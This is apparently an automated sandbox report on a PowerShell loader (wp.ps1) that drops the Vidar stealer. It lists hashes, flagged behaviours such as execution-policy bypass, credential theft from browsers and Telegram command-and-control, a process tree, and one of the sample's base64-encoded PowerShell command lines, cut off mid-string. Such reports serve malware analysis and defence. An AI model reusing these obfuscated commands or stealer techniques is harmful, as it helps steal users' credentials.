download:

/wp.ps1

Full analysis: https://app.any.run/tasks/46e44ddc-b18d-410b-8d30-a3f2a17ec47c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: June 21, 2025, 13:08:37
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
vidar
stealer
telegram
golang
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (7072), with no line terminators
MD5:

0C2958B9A75251A60D2EBDF13CFF0339

SHA1:

E01B5994ED22874C9CA6FD3A2018579423BA64AA

SHA256:

F32ACA620229864C751889FFF828C510EE1C5FC1F760A87320F8D3C8898D9EF4

SSDEEP:

192:+sxBHkgZNsn2tb0qANsq9mzChCd7BPZZFzoEHwwA+FHhtDH:RFy2uwq8dF/Z

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3864)
      • powershell.exe (PID: 5124)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 5124)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 1128)

    • Executing a file with an untrusted certificate

      • build.exe (PID: 5060)

    • VIDAR mutex has been found

      • explorer.exe (PID: 4800)

    • Steals credentials from Web Browsers

      • explorer.exe (PID: 4800)

    • VIDAR has been detected (SURICATA)

      • explorer.exe (PID: 4800)

    • Actions looks like stealing of personal data

      • explorer.exe (PID: 4800)

  • SUSPICIOUS

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 3864)
      • powershell.exe (PID: 2072)
      • powershell.exe (PID: 2220)
      • explorer.exe (PID: 4800)

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 3864)
      • powershell.exe (PID: 2072)
      • powershell.exe (PID: 2220)
      • explorer.exe (PID: 4800)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 3864)
      • powershell.exe (PID: 2072)
      • powershell.exe (PID: 2220)
      • cmd.exe (PID: 1128)
      • explorer.exe (PID: 4800)

    • Application launched itself

      • powershell.exe (PID: 3864)
      • powershell.exe (PID: 2072)
      • powershell.exe (PID: 2220)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 5124)

    • Connects to the server without a host name

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 5124)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2764)
      • csc.exe (PID: 6900)
      • csc.exe (PID: 2632)
      • UnRAR.exe (PID: 7164)
      • csc.exe (PID: 5244)
      • csc.exe (PID: 5904)
      • csc.exe (PID: 6068)
      • csc.exe (PID: 4832)

    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 5124)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 2952)
      • powershell.exe (PID: 3788)
      • powershell.exe (PID: 4552)
      • powershell.exe (PID: 5708)
      • powershell.exe (PID: 2228)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6900)
      • csc.exe (PID: 2632)
      • csc.exe (PID: 5244)
      • csc.exe (PID: 5904)
      • csc.exe (PID: 6068)
      • csc.exe (PID: 4832)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 2764)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 5124)
      • powershell.exe (PID: 2764)

    • The executable file from the user directory is run by the CMD process

      • UnRAR.exe (PID: 7164)

    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 2952)
      • powershell.exe (PID: 3788)
      • powershell.exe (PID: 4552)
      • powershell.exe (PID: 5708)
      • powershell.exe (PID: 2228)

    • The process executes Powershell scripts

      • cmd.exe (PID: 1128)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • explorer.exe (PID: 4800)

    • Searches for installed software

      • explorer.exe (PID: 4800)

    • The process hide an interactive prompt from the user

      • explorer.exe (PID: 4800)

    • The process bypasses the loading of PowerShell profile settings

      • explorer.exe (PID: 4800)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 5124)

    • Checks proxy server information

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 5124)
      • explorer.exe (PID: 4800)
      • slui.exe (PID: 4700)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 2764)

    • Checks supported languages

      • UnRAR.exe (PID: 5080)
      • cvtres.exe (PID: 4084)
      • csc.exe (PID: 6900)
      • UnRAR.exe (PID: 7164)
      • build.exe (PID: 5060)
      • cvtres.exe (PID: 3148)
      • csc.exe (PID: 2632)
      • cvtres.exe (PID: 3908)
      • csc.exe (PID: 5244)
      • csc.exe (PID: 5904)
      • cvtres.exe (PID: 1520)
      • csc.exe (PID: 6068)
      • cvtres.exe (PID: 5116)
      • csc.exe (PID: 4832)
      • cvtres.exe (PID: 2232)

    • Create files in a temporary directory

      • UnRAR.exe (PID: 5080)
      • cvtres.exe (PID: 4084)
      • csc.exe (PID: 6900)
      • UnRAR.exe (PID: 7164)
      • build.exe (PID: 5060)
      • explorer.exe (PID: 4800)
      • powershell.exe (PID: 4040)
      • powershell.exe (PID: 2368)
      • powershell.exe (PID: 3100)
      • powershell.exe (PID: 1328)
      • powershell.exe (PID: 2952)
      • cvtres.exe (PID: 3148)
      • csc.exe (PID: 2632)
      • powershell.exe (PID: 3788)
      • cvtres.exe (PID: 3908)
      • powershell.exe (PID: 2664)
      • csc.exe (PID: 5244)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 4552)
      • csc.exe (PID: 5904)
      • cvtres.exe (PID: 1520)
      • powershell.exe (PID: 3968)
      • powershell.exe (PID: 5708)
      • csc.exe (PID: 6068)
      • cvtres.exe (PID: 5116)
      • cvtres.exe (PID: 2232)
      • powershell.exe (PID: 6360)
      • powershell.exe (PID: 2228)
      • csc.exe (PID: 4832)
      • powershell.exe (PID: 5480)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 6900)
      • csc.exe (PID: 2632)
      • csc.exe (PID: 5244)
      • csc.exe (PID: 5904)
      • csc.exe (PID: 6068)
      • csc.exe (PID: 4832)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 4040)
      • powershell.exe (PID: 2368)
      • powershell.exe (PID: 1328)
      • powershell.exe (PID: 3100)
      • powershell.exe (PID: 2664)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 3968)
      • powershell.exe (PID: 6360)
      • powershell.exe (PID: 5480)

    • The sample compiled with english language support

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 5124)

    • The executable file from the user directory is run by the Powershell process

      • UnRAR.exe (PID: 5080)
      • build.exe (PID: 5060)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 2764)

    • Application based on Golang

      • build.exe (PID: 5060)

    • Creates files in the program directory

      • explorer.exe (PID: 4800)

    • Reads the software policy settings

      • explorer.exe (PID: 4800)
      • powershell.exe (PID: 4040)
      • powershell.exe (PID: 2368)
      • powershell.exe (PID: 3100)
      • powershell.exe (PID: 1328)
      • powershell.exe (PID: 2952)
      • powershell.exe (PID: 3788)
      • powershell.exe (PID: 2664)
      • slui.exe (PID: 4700)
      • powershell.exe (PID: 4552)
      • powershell.exe (PID: 3968)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 5708)
      • powershell.exe (PID: 6360)
      • powershell.exe (PID: 2228)
      • powershell.exe (PID: 5480)

    • Reads security settings of Internet Explorer

      • explorer.exe (PID: 4800)
      • powershell.exe (PID: 4040)
      • powershell.exe (PID: 2368)
      • powershell.exe (PID: 1328)
      • powershell.exe (PID: 3100)
      • powershell.exe (PID: 2952)
      • powershell.exe (PID: 3788)
      • powershell.exe (PID: 2664)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 4552)
      • powershell.exe (PID: 3968)
      • powershell.exe (PID: 5708)
      • powershell.exe (PID: 6360)
      • powershell.exe (PID: 2228)
      • powershell.exe (PID: 5480)

    • Creates files or folders in the user directory

      • explorer.exe (PID: 4800)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4040)
      • powershell.exe (PID: 2368)
      • powershell.exe (PID: 3100)
      • powershell.exe (PID: 1328)
      • powershell.exe (PID: 2664)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 3968)
      • powershell.exe (PID: 5480)
      • powershell.exe (PID: 6360)

    • Application launched itself

      • chrome.exe (PID: 1688)
      • chrome.exe (PID: 424)
      • chrome.exe (PID: 2668)
      • chrome.exe (PID: 6256)
      • chrome.exe (PID: 1488)
      • chrome.exe (PID: 1720)
      • chrome.exe (PID: 3780)
      • chrome.exe (PID: 6180)
      • chrome.exe (PID: 432)
      • chrome.exe (PID: 6420)
      • chrome.exe (PID: 6736)
      • chrome.exe (PID: 5340)
      • chrome.exe (PID: 1752)
      • chrome.exe (PID: 1236)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
339
Monitored processes
192
Malicious processes
8
Suspicious processes
3

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe unrar.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs unrar.exe build.exe no specs #VIDAR explorer.exe slui.exe chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe chrome.exe no specs cvtres.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
316"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3444,i,2735226165529091423,17715300358233871350,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=3492 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
420\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
424"C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exeexplorer.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
432"C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
480"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffc44bffff8,0x7ffc44c00004,0x7ffc44c00010C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
592C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "IwAgAEIAeAApAHIAbwAuAG4AWQBSACUAcAA+ADwAcgBEACUAeABXADMAVQBiAFgAZwB9AGoAXQB9AFsANQA6AFgAdQBhAFkAXgA+ADcAOgBHADcAagBxAFcAeABYACkAXwBdAF4AVwAsADoASwBSAGwAbgBAAFQALgBFAHwAIQBOACoAagBDAHIAQABxAE4AcwA7AEEAIQBuACwAKwBpAEkAWgB5AFIAegB7AD4AawB3AEAAWQBMAG0AOQB4AHIAPwBlADwAcgBDAGoAZABiAG8AJgBDAGwAZQAyAGwAZgA3AEwAOQBWAF0ALgBTAGQAVwBoAFYASABzAEYAVgBZAHcASABQAEwASwAzAG0ASgBKAF4ANgA9AG8ASwBdACsAcgBsAE8ASgBkAEkAcwBPACkAbQBzAG4AaABJAHAALQArAHMAKgBUAFkANQB8AG4AMgA7AGQAdQB7AGQAcgA2AGMAOQAhAD0AYgArAGcAJAAsAFUAagB7ADEAagAwADgAIQBnAEcAdABTAHsAMQBRAGEAQAA0AHgAQwBQAFMARwAgAFQASAAhACMAOgAwAGwAPAA/AEEANgA9ACEAIAA4AGIAfQAqAFgAOQBDAGoAWwB1AD8AVQA+AG8AWwAuAG8AaQBzAF0AdQB5AFAAUwArAE8AJABoAG0AQQA1AFoARwBUADIAXwBnAFYAKgA/AHYAdQBYAGMAOABEAGYAQAAqADgAZgBuACQAfQAsACgAOAB4AD4AQAAlAFYAbwAoAGYASwBSAFkAZwB4AFAAJgA2AEsALABUAE0AJgBnADEAIQBaAGkAdQA6AEMATQA0AGgANQBnAHAAbABWAF0AXgAuAHQANgBeAG0AYgAuAEYASQBrACQAVwA9AHkAQwB1ADgAcgAkADEAPABEAHsANgAzADwAOwBrAGkAcgAmAGUAagBGADoAXQBNADoATABFAF4ALgBHACoAZABUAEUAMgApAHkAUQBFADIAJQBZAFAAagA8ADgAMAA7AD0AbgA9ADwAVgBlADwARwB7AGgAQQBBAGEAaQBwAE8AOgBYAEUAKgBeADUAKwBVAFMALQB7AG8AcwBsAEwAdgBhAFEAQAAhAHAASAB1ADUAMgBDAF0AZgAhAFUAZABoAGwAPgBbAHgATgBOAF4AZwBCACsAKwAgAD4AMwBaAF8AXgA0AC0AOwBZAGIARgBrAE0AKgAtAEcAUQAkACAAUwBnAGoAUwBmAGkATABlAF4AdQA4AHUAIQAxAHsARABCAEQAWAAmAEYAOgBeAF4ASwBRACYALQBSAE0ATQAlACUAZQBMAHIAagB3AHMAMQBFAC4AQwA0AHUATABEAHcAWQBOAFUAPAAoAGUAJAAqACMAYwBwAGsAKgBoAEsAOQBAAEMAXgBRAGMAMwBsAEQAJQBRAD8APgBoAGIAagBNAGMAcQBaAE0AfQAkAGoAfQAmAF8AIAAtAE4AYwA1ADUAJgA7AF4AOwBVADcANgBIACQARwB1AG8AOgA4AGoAWQBfAD8AdQA/AE0AVABrAEYAKQBNAFcAJgB3AG0AUQBfAEsANgBzAHQAMgAsADoASABzAFcAPgBaAHsAaABTAHwAPwA1AFcAMQB6AEcAcgBkAGcANQAoAFkAfQAkAHwAPwBFAGgAMABWAFMAWgBTAHoAZgBpAFYAIwB4AGgAdQAwAEUAPABLAFUAPwBpAHoARABJAG4ASgBBACkAaQB3AE8AIAA6AHcAPgBYAHgAPABtADsAWQB0AF4APABtAF4AcgBDAEgAfAB9ACMAZgANAAoAIAAgACAAIwAgAHMAWwA1AEcAJABaAEYARAAoAHQAMwA5AD0AIAAjAEIAMgAlAEkATAAgAGgAOAA+AH0AbQBrAF0APgBwAHwATwBHAFAASQB8AE0APgAxAHUAQAAsAGcAUwAqADkATwBYAE4AXwA9AHwAXQBNAEYAOQBrAFAAVgA5AFEAOAAyACgAQgBHACwAbQA+AGcAQQBHAHUAeAAkADUAagBMAHoAZAB2AFcAYwA1ADsASgA6ADwASgAhADgATQBkAGUAWwBqAFsAQwBIAGMAWgBiAEYAdgBGAF0ATwBnAEsAVwBuAG0AIwBeAEYAbgBsAGIAQQA3AF8AbgBnAE0AWgA4AEoAYQApAGsAUgB8ACwAIwByAHQAewBPAEgAcgBIAGsAcwAoAE0AeQBwAFIAZgBkADQAOABtAFsAIQBIAG0AewBwAHUAdQArAHkANgAhAFIATABoAEcAQABTAFoAJQB1ADcAWgA3AHMAbAAwACwAUQAgAHMAbQBsADIAIQAwAC0AaQB4ADMAQQAkAEMAVQBIAG0AXgBaAHoAVAAsADMAUQBmAF0AeABpADUAegBiAG4AQQBwAFEAPQBJADcAfAArACsAYgA+AC4AagBWAGcAVAA4AHIAawBaAF4AeQBvACEAfQApAEcAOABoADkAMgA5ADYAQQBxAHoAfQAhAHkANQBAACUAUQA/ACUASwA1ADwAbQAqAGMALQA3AEEAPwBTAC4AWQBdAGMAeQBqADoAVQB0ACgAUgB0AFMAIABjAHwARgBLAGMARwBsAHgAMQB1AHQAPwBEAEsAUAA2ACgAXgAuAG8ASgByADAAWgBmACsAeQA0ADgATAAwAEUAVgBMADwAQwBVAHEAUgB3AFYAMwBRAFMAMgA3AE0AegAlADgAPgBDADAAaAA7AHsAdgA2ACQAMQBBAEYAZABuAEMATABvADYAYQBIADsAZgAzAHoAQgBRADwAMwAmAHwAfAAhAHgASQAtAE4AYwBqAFMAOQBSAFcAWQAzAEgAVwBFAF8AKwBJAEwAaAAwADgAIwB8AHAAdQBFAD4AbwA3AD4AYwB5ADUAXQBiAGcAeQBAAHAARgAgAFMAZQBIAD4AWgA2AHYAeABFAEUAYgBKAFYAOwB1ACEAXQBnAHsATQBWAD8AVQBhAEMAIQBxACoAIQBnAHgARQA9AGsASQBjAEUAUgAjAGwAUAA3AE4ARAA2ADEAXwBlAFAAbQBNAHEAWwB8AHkAMABBAGUAPABeAG0AdgAhADkAMQBLAD8AaABCAHwALgBwAC4AQwAsAHcAQQAhAF4AUAB8AHcAaAAgACkAJABGADAAJgBbAD8AawBdAHEAdgBIAGkAMwA7AHIAVgBfAHIAJgBMAEAAVgA7AEwAVgB0AEEAdwBHADMAcAB0AEUAKQBTAF0ANgBJAEcAaQBKADAARQA5ACMAQgBWAA0ACgAgACAAIAAgACAAIAAgACAAIwAgAFEAKgB2AD8AdQBqAHkATQBHAGcAXwAwAH0AeQB0ADcARABjACEAXwB0AF4AcQBDAEkAXwA/ADcATQB6ACsAOgBCAF0ANwBPAE8AcQBeAEIAYgBsAGgAQwBZACgAXwBOAG8AIQBKAHAASABQAFAAYgBOACMAPABAAEgALgAgAFEAIQBJAC4ARQBnAEwAcABDAEsAJAA4AFgAVgBDAEUASAB1AGwARABkAHwARAA3AD8AZwAxAD4ANgBsAD0AMwBPAHUARQBTAEsAdwA/AHAAcwAkAD8ARABZAGYANwBaAEIAPQByAD0AUwArAFIAUgBqAHsANAAoADwAbABeAFIAUQArAEAARAAyAFUAUAA4AGkAZQA4AE8APwAhACkAOwA5AFIAUgBjADsAZQBWAEQAWgB7AGYAdwBrAEMALQA3AGMARgBsAGsAKAAqAH0AJQBbAG4AYwBdACwAewBPAF8AdABbAE8AawBxADgAUQA1AF0AVQBaAG8AUQBmAE4AbgBJADkASgBRAEMAMwBVAFMAKwB8ADAARQBzAC4AUwAwAD0AWABpAGcAOAAoAGYASQB1AFEAKwAxADsAcwBKAG0AKQBYACoAMwBBACkATgBpAEMAdQAuAEAAQAAzACsAcQBWADMASQBvADAAPgBUAGMAOABQAFcAZQBrAEQARQAkAD4AKgB0AHAAUAAmAGIAPAAyACsASQBNAHIAZwBjAEIATwBFACYAUQBuADsAZABQADsAbABmAE8ASgBkAHcAagB1AGEAcAB6ADAARABZACYALABbADQAewBTADoAZwAqAGEAPQB2AG4AWgBwAF4ANwBJAEIAMgAhAFAAZABwAEYAcQBNAFYAKgBLAFUAWAB1AFUAUwB4AEUAIQBbADoAdQBFACwAeAB3AHgAdABeADQAPwBUAE8AegAhADoAUABCAEAAVQBXAE4AVwAwAEgAcAA7AGoASABYACAAbgBYAG4AewB7AHUATgAyAGEANwBsAFcAUwBUAGsAVABRADEAYgA7AFIAWgAgAHAAbwA4AF0AbwB5AF0ALQA5AFIATgBCADcAZgB3AD8AJgBrACUAUwBWAEsAPwBdAFcAVgBjAD8ANgA3AD0AegBLACUAQAA/AEAAcgB2AEYAQQByAFUAYQA5ADsAXQBpAHUAXQAoACwAbABYAEAAcgBuADwAQQBQAF4AewB8AFkAdgANAAoAIAAgACAAIAAgACAAIwAgADEATAB0ACkAcQA6AFgAXQAkAFoAUwA2AHMAZAAoADcAYgBfAEsAZwBoACEANwBKAHAAKgBiAGUAcwBTAEEAfQA5ADYALQBoAHAAMgAjAEIAbgB7AEEAcgBrACEAVQBGAHkAVQBRAD8AWwBJAEgAXgBiAH0ASgB0AH0APwBaAC4ATgBNAHIAJQBdAHAAPQBlAFEAIwA6AEUATgA6ACAAWgBXADcAOAB4ADUAJABHADkAZwAhAEMAdQBrACAAPABaAD0AXwAqAGYAQgBBACsAeQByAF8AeQBxADwATABMAGgALgBtACQAcgB7ACgAVQBdAGsASQAsAGIAYwA0AD0AOwA/ACsALQA+AGcAbQBxAGgAcgAwACAAPQBpAEsAKgBkADoAbQAjADcAJAByAFgANwBnAE0AJQAzAGEAXQBmAC4AOQB4AGMANAB4ADEAKAB8AGkAZwBXAHQAVAA3ADUAOgBlAG4AJABuAEUAIQB8AF4AJAAmACEARwBJAEsAMABWAHUAQwBmAHsAawBTAFcAQgBIAEkAdAAwAHgAVAA7AF0AMABmAEQAWwAwADcAdAAjAHsANAAqAFQAZgA4AF4AWQBZAGcAegA3AGsANABDADUAfABSAGkANwB9AHUAMABVAEsAbAA1AHgARwArAFYARgBYAHAAWgA1AHoAWABTADEAXgB8AGoAcQAkAF0AWAAtAFoAXwAzAHsAIwAuAFEAKwAtAFAAKABfAGMAQQBtADwANwA7AHYAWABkAE4AYQBMAD4AWABGAHcAXQBEADMAdgBXAHwAXwApAEcAPwAhAHQAaQA6AEIAUQA0ADgAZQAjACsAbQA+AGQAJABYAGgAMgBpAFIARQAyADAAWgBGADkAUQAxAHwAMwB0AEcAIwBWAC0ATAA/ACMAMgBRADAAKwBoAGsANwAyAGsAcAAsACoAQgBaACAAIwBDADsAZQA0AGIAVgBrAGEAewBGAGEAUQBNADMAewAyACEARQBrAGYAdABuACwAWAAyAGoASgAjADIAKQBsAEYAbQBpAHMANAByAGIAUAAqAE4ANABSAD8AKQBxAFcALgBGACQAQgBdAHUAQQBxADEAawAoAFEAPQA+ACkAeQBnAEAAegAsAHEAcAAwAGsATQAwADwAZABvAEwAQABXAGcAcAA/AHwAOAB6ADsAJABMAFEAcQB5ADsAQwBYAEcAKABzAE4APgAwAHsAMgAlACoAWQA8AEsAJgB3AFkAQQBpAFkANQArACMAbwA0AGMAOgBvAFcAXwBmAF4AWAAtACsAVwBPAHAASgA3AEYANQBAAFQAMABaAEYAVgBjAD8AVgAgACQAKwArADQANQB8AD4AMwBsAEEAaQBGAEsAcgByAF4AKgApAEYAVQBRAEIAXQA+AFcAbgBXAF4AKgBGAHkAPwB2AFAALABDACwARgBKACwAcABZAFgARwByADsAQwAqAF8AMgA6AG0AIABLAC0AdwBwAEkAPQB7AFsAQABbAHcAKgBzAG8AOwApAEoATAAjAD4AZQBAAGIATAAgAHIAewB0ACAAbABXAFYATQAsAF8AZgBrACUAIQA+ADgAeAB3ACEARQB4AGkAWQBtADIAfABuAE8ASAA6AG0APQBBAG4ARwAzAFsAZQAsADEAMABzAFAAeABZAGEAPgBIADEAcQB6AHUAIAAjAEcAWgAhAFAAbgB1AHMAdABKAGoAJgAxAGwAUAAkAGUARgBWACMAQQBkAG4AMABhAG4AOgBEACkAcABJAFMAcQA1AGEAVQBFAC4AOwAtAE0AUQA8AGsAUgA3ADkAawBaAFAAaQA8AHAAIQBRAEUARgA4ACwASABPACoAXgBzAEEAKABWAGoARwA3AF8AQwBSAHMAbABWAG0AXQAhACsAPgBJAHkAOgB5AGQAdQA3ADMAVwBhAEcAQgAuACwAWgAoAHgAfQBlAGUAZgBKAG0AcAAlAE8AIAB4AGQAIABuADkAdgBdAH0AVwA+AEoANABVAFcATwA7AEAAcQBuADcARAA+AEwAWwBmAGEAKAAjADAAZgBEADwAVgBpAFsATwA0AGkAQgBwACEANwB0AFYAdgBwAEQALABDAF4AcQBrAFMAIAA6AE8ANwBkADkAJQBJAFMAPABRACMAIwBtAHQAQgBaACwASQBzAEIAfQAzAGcAWABXAF4AJABzAHUAYwAgACQAYgB0ADQAIQBqACwAUAA/AEgAMwBLACAAXgB8AEQARABUACkATQBkAEkASwBhAFgARwBaACwATwA6AEQAYgBJACwASAA0AFsAKABjAGIAQgB4AHkARQBkAG8AOwB2AC4AfAA3AHgAMwAjAEEAPgAzAHMAeQA+AEEAbABQAFYAWAB4ACkARwBaACEATgBTAFcALQBOACAAaQB9AGYAQABKADIASAA9AGIARwAjAHMAOgB4AF0AdgBkAGIAIQBFACUAeQBzADcAegBIAEgAQ